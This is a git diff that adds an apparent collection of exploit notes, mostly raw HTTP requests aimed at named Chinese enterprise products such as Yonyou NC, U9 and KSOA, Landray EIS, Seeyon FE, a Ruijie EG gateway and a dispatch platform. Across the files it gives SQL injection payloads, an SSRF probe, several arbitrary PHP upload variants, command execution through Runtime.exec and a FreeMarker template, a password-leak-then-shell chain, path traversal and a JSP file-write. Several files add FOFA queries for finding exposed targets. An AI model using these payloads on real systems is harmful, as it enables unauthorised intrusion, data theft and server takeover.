--- a/表达式注入漏洞.md
+++ b/表达式注入漏洞.md
@@ -0,0 +1 @@
+/oauth/public/SpEL表达式/ab?username=bHM=
--- a/SQL注入漏洞.md
+++ b/SQL注入漏洞.md
@@ -0,0 +1,12 @@
+fofa
+
+product="用友-NC-Cloud"
+
+```
+GET /ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Connection: close
+```
+
--- a/linkntb存在SQL注入漏洞.md
+++ b/linkntb存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+```
+GET /yer/html/nodes/linkntb/linkntb.jsp?pageId=linkntb&billId=1%27%29+AND+5846%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%285846%3D5846%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29--+Astq&djdl=1&rand=1 HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Cookie: JSESSIONID=FC1C64E67AE8D02989467988D2FF143A.server; JSESSIONID=5BA15086E03362F38918286E9E0C0E24.server
+Upgrade-Insecure-Requests: 1
+Priority: u=1
+```
+
--- a/用友U9系统DoQuery接口存在SQL注入.md
+++ b/用友U9系统DoQuery接口存在SQL注入.md
@@ -0,0 +1,51 @@
+```
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 309
+SOAPAction: "http://tempuri.org/GetEnterprise"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<GetEnterprise xmlns="http://tempuri.org/" />
+</soap:Body>
+</soap:Envelope>
+
+
+
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 345
+SOAPAction: "http://tempuri.org/GetToken"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<GetToken xmlns="http://tempuri.org/">
+<endId>000</endId>
+</GetToken>
+</soap:Body>
+</soap:Envelope>
+
+
+
+
+POST /U9C/CS/Office/TransWebService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: 345
+SOAPAction: "http://tempuri.org/DoQuery"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<DoQuery xmlns="http://tempuri.org/">
+<token></token>
+<command>select 1;waitfor delay '0:0:1' --</command>
+</DoQuery>
+</soap:Body>
+</soap:Envelope>
+```
+
--- a/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md
+++ b/用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md
@@ -0,0 +1,7 @@
+```
+GET /kp/PrintZP.jsp?zpfbbh=1%27+IF(LEN(db_name())>4)+WAITFOR+DELAY+%270:0:2%27+--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
--- a/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md
+++ b/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md
@@ -0,0 +1,7 @@
+```
+GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
--- a/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md
+++ b/用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md
@@ -0,0 +1,8 @@
+```
+
+GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connec
+```
+
--- a/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md
+++ b/用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md
@@ -0,0 +1,7 @@
+```
+GET /kp/PrintZPZP.jsp?zpshqid=1%27+union+select+1,2,db_name(),4,5,6,7,8,9,10,11,12,13+--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
--- a/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md
+++ b/用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md
@@ -0,0 +1,7 @@
+```
+GET /kp/fillKP.jsp?kp_djbh=1%27+IF(LEN(db_name())>4)+WAITFOR%20DELAY%20%270:0:2%27+--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
--- a/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md
+++ b/用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md
@@ -0,0 +1,19 @@
+```
+POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+
+{
+"address":"ftlhbc.dnslog.cn"
+}
+```
+
--- a/福建科立讯通信指挥调度管理平台任意文件上传.md
+++ b/福建科立讯通信指挥调度管理平台任意文件上传.md
@@ -0,0 +1,185 @@
+利用方式1
+
+```
+
+POST /api/client/fileupload.php HTTP/1.1          
+Host:           
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close          
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Length: 477          
+
+
+          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="file"; filename="rcnlsq.php"          
+Content-Type: image/jpeg          
+
+
+          
+5465rcnlsq          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="number";          
+
+
+          
+5465          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="type";          
+
+
+          
+1          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="title";          
+
+
+          
+1          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M--    
+```
+
+
+
+
+
+利用方式2
+
+```
+
+POST /api/client/upload.php HTTP/1.1          
+Host:           
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close          
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Length: 194          
+
+
+          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"          
+Content-Type: image/jpeg          
+
+
+          
+99647lztkkl          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          
+
+
+          
+GET /upload/lztkkl.php HTTP/1.1          
+Host:           
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close
+
+```
+
+
+
+
+
+利用方式3
+
+```
+POST /api/client/task/uploadfile.php HTTP/1.1          
+Host:           
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close          
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Length: 198          
+
+
+          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"          
+Content-Type: image/jpeg          
+
+
+          
+97236rvfuid          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          
+
+
+          
+文件路径：响应包获取
+```
+
+
+
+利用方式4
+
+```
+
+POST /api/client/event/uploadfile.php HTTP/1.1          
+Host:           
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close          
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Length: 198          
+
+
+          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
+Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"          
+Content-Type: image/jpeg          
+
+
+          
+48620iuctmt          
+------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          
+
+
+          
+文件地址：响应包获取
+```
+
+
+
+利用方式5
+
+```
+POST /api/client/upload.php HTTP/1.1          
+Host:           
+User-Agent: python-requests/2.31.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close          
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK          
+Content-Length: 200          
+
+
+          
+------WebKitFormBoundarymVk33liI64J7GQaK          
+Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"          
+Content-Type: image/jpeg          
+
+
+          
+dzfuxvtm186448          
+------WebKitFormBoundarymVk33liI64J7GQaK--          
+
+
+          
+GET /upload/dzfuxvtm.php HTTP/1.1          
+Host:           
+User-Agent: python-requests/2.31.0          
+Accept-Encoding: gzip, deflate          
+Accept: */*          
+Connection: close    
+```
+
+FOFA检索：
+
+```
+body="指挥调度管理平台" && title=="指挥调度管理平台"
+```
--- a/科荣AIO系统UtilServlet存在任意命令执行漏洞.md
+++ b/科荣AIO系统UtilServlet存在任意命令执行漏洞.md
@@ -0,0 +1,15 @@
+```
+
+POST /UtilServlet HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Host:  
+Content-Length: 324
+Content-Type: application/x-www-form-urlencoded
+
+operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+ipconfig").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
+
+```
+
--- a/致远互联FE协作办公平台apprvaddNew存在SQL注入.md
+++ b/致远互联FE协作办公平台apprvaddNew存在SQL注入.md
@@ -0,0 +1,18 @@
+fofa
+
+```
+body="li_plugins_download"
+```
+
+```http
+POST /witapprovemanage/apprvaddNew.jsp HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 95
+
+flowid=1' AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(116)||CHR(104)||CHR(85),3) AND '1'='1
+```
+
--- a/蓝凌EIS智慧协同平台ShowUserInfo.aspx
+++ b/蓝凌EIS智慧协同平台ShowUserInfo.aspx
@@ -0,0 +1,15 @@
+```
+GET /third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+
+HTTP/1.1
+Host: x
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/蓝凌EIS智慧协同平台UniformEntry.aspx
+++ b/蓝凌EIS智慧协同平台UniformEntry.aspx
@@ -0,0 +1,15 @@
+```
+GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+
+HTTP/1.1
+Host: xxxx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/蓝凌EIS智慧协同平台doc_fileedit_word.aspx
+++ b/蓝凌EIS智慧协同平台doc_fileedit_word.aspx
@@ -0,0 +1,15 @@
+```
+GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--
+&edittype=1,1 HTTP/1.1
+Host: xxxx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx
+++ b/蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx
@@ -0,0 +1,14 @@
+```
+GET /flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+ HTTP/1.1
+Host: x
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/蓝凌EIS智慧协同平台frm_button_func.aspx
+++ b/蓝凌EIS智慧协同平台frm_button_func.aspx
@@ -0,0 +1,14 @@
+```
+GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTTP/1.1
+Host: xxxx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/蓝凌EIS智慧协同平台frm_form_list_main.aspx
+++ b/蓝凌EIS智慧协同平台frm_form_list_main.aspx
@@ -0,0 +1,14 @@
+```
+GET /frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+ HTTP/1.1
+Host: x
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
+e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
--- a/证书查询系统存在任意文件读取漏洞.md
+++ b/证书查询系统存在任意文件读取漏洞.md
@@ -0,0 +1,7 @@
+```
+GET /index/ajax/lang?lang=../../application/database HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+```
+
--- a/金和OA_SAP_B1Config.aspx未授权访问漏洞.md
+++ b/金和OA_SAP_B1Config.aspx未授权访问漏洞.md
@@ -1,4 +1,4 @@
 ```
-/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1
+ /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1
 ```

--- a/远程代码执行漏洞.md
+++ b/远程代码执行漏洞.md
@@ -0,0 +1,19 @@
+```
+POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%69%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%30%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%69%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%67%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e%67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%22%2e%68%74%6d%22%5d%7d%0a&action=uploadimage HTTP/1.1  
+User-Agent: xxx  
+Accept: \*/\*  
+Postman-Token: bb71767c-7223-4ba3-8151-c81b8a5dc1ec  
+Host: 127.0.0.1:8080  
+Accept-Encoding: gzip, deflate  
+Connection: close  
+Content-Type: multipart/form-data; boundary=--------------------------583450229485407027180070  
+Content-Length: 279  
+  
+----------------------------583450229485407027180070  
+Content-Disposition: form-data; name="upload"; filename="1.htm"  
+Content-Type: image/png  
+  
+<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whoami") }  
+----------------------------583450229485407027180070--  
+```
+
--- a/锐捷-EG易网关存在RCE漏洞.md
+++ b/锐捷-EG易网关存在RCE漏洞.md
@@ -0,0 +1,25 @@
+```
+获取用户密码
+POST /login.php HTTP/1.1
+Host: 10.10.10.10
+User-Agent: Go-http-client/1.1
+Content-Length: 49
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+username=admin&password=admin?show+webmaster+user
+
+命令执行
+POST /cli.php?a=shell HTTP/1.1
+Host: 10.10.10.10
+User-Agent: Go-http-client/1.1
+Content-Length: 24
+Content-Type: application/x-www-form-urlencoded
+Cookie: 利用登录后Cookie的RUIJIEID字段进行替换，;user=admin; 
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+notdelay=true&command=ls
+```
+
--- a/接口任意文件上传.md
+++ b/接口任意文件上传.md
@@ -0,0 +1,22 @@
+```
+
+GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: /
+Host: 
+Connection: close
+```
+
+
+
+
+
+
+
+
+
+```
+/magicflu/test1.jsp
+```
+
				`@@ -0,0 +1 @@`
				`/oauth/public/SpEL表达式/ab?username=bHM=`